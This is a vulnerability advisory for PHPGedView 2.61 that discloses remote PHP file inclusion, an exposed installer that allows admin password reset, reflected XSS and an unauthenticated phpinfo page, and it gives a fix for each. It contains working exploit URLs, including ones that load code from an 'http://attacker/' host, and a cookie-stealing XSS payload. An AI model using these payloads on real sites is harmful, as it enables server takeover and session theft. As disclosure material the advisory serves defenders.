<<< Date Index >>>     <<< Thread Index >>>

Vuln in PHPGEDVIEW 2.61 Multi-Problem




Tittle : Vuln in  PHPGEDVIEW  2.61
Lang : PHP  
Author : Windak
Website: www.security.com.vn
Version : PHPGEDVIEW 2.61 Multi-Problem

Introduction :

PHPGEDVIEW is program read projects GEDCOM file ( default html ) .

Bug :  

1) Php code injection : 

Rick : Hight 
- Vuln in any files : functions.php, authentication_index.php 
,config_gedcom.php 

In authentication_index.php file : at line 33 : 

require $PGV_BASE_DIRECTORY."authenticate.php"; 

In functions.php file : at line 35 : 

require($PGV_BASE_DIRECTORY."functions_print.php"); 

In config_gedcom.php file :  at line 115 : 

if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) 
require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php"); 
else { 
$THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/"; 
require($THEME_DIR."theme.php"); 


Exploit  : 

http://target/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://attacker/
 
http://target/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://attacker/
 
http://target/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://attacker/
 

Script named authenticate.php put in http://attacker/  ( or functions_print.php 
, theme.php put in folder /themes/standard /

FIX  : add firt line files have been vuln :  Require (config.php); 

2) Config again : 
rick: Medium 
If you not deleted editconfig.php file after install then attacker can 
reinstall and change password administrator .
Link : http://target/phpgedview_folder/editconfig.php 
fix : Delete editconfig.php file

3) XSS : 
Rick  : medium 

Exploit : 
http://localhost/phpgedview/search.php?action=soundex&firstname=";>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
 

fix : 

Find : 
<input type="text" name="firstname" value="<?php if ($action=="soundex") print 
$firstname; size="20" ?>" /></td></tr> 
<tr><td><?php print $pgv_lang["lastname_search"]?></td><td> 
<input type="text" name="lastname" value="<?php if ($action=="soundex") print 
$lastname; size="20" ?>" /></td></tr> 
<tr><td><?php print $pgv_lang["search_place"]?></td><td> 
<input type="text" name="place" value="<?php if ($action=="soundex") print 
$place; size="20" ?>" /></td></tr> 
<tr><td><?php print $pgv_lang["search_year"]?></td><td> 
<input type="text" name="year" value="<?php if ($action=="soundex") print 
$year; size="20" ?>" /></td></tr> 

replace with : 

<input type="text" name="firstname" value="" /></td></tr> 
<tr><td><?php print $pgv_lang["lastname_search"]?></td><td> 
<input type="text" name="lastname" value="" /></td></tr> 
<tr><td><?php print $pgv_lang["search_place"]?></td><td> 
<input type="text" name="place" value="" /></td></tr> 
<tr><td><?php print $pgv_lang["search_year"]?></td><td> 
<input type="text" name="year" value="" /></td></tr> 

4) Show info server : 
rick : low 
I can show info server 
Link: http://target/phpgedview_folder/admin.php?action=phpinfo 

fix : 
Find :  

if (!isset($action)) $action=""; 
if ($action=="phpinfo") { 
phpinfo(); 
exit; 
} 

if (!userIsAdmin(getUserName())) { 
header("Location: login.php?url=admin.php"); 
exit; 
} 

replace with : 

if (!userIsAdmin(getUserName())) { 
header("Location: login.php?url=admin.php"); 
exit; 
} 
if (!isset($action)) $action=""; 
if ($action=="phpinfo") { 
phpinfo(); 
exit; 
} 

=======================================================================
Windak - Vietnamese Security Group

www.security.com.vn